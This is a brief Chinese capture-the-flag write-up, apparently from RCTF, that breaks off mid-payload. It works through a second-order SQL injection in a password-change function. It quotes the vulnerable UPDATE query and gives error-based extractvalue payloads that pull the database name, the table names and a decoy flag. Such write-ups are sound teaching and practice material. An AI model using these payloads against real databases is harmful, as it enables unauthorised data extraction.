有修改密码怀疑是2次注入
admin被注册
sqli-lab24关中遇到过二次注入
特地去看了下代码
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
一开始尝试admin’# 修改密码
admin还是登陆不上
使用admin"# 修改密码后,可以使用admin登陆上,但是没任何变化
试下报错注入
注册的时候发现有过滤
1"||extractvalue(1,concat(0x7e,(database()),0x7e))#
得到数据库名:web_sqli
1"||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)=(database()))),0x7e))#
得到表名article,flag,users
盲猜列名 flag
1"||extractvalue(1,concat(0x7e,(select(group_concat(flag))from(flag)),0x7e))#
获得"~RCTF{Good job! But flag not her"
疯了,只能试下别的表,希望不要是被我修改了的admin密码
1"||extractvalue(1,concat(0x7e,(select(group_concat(col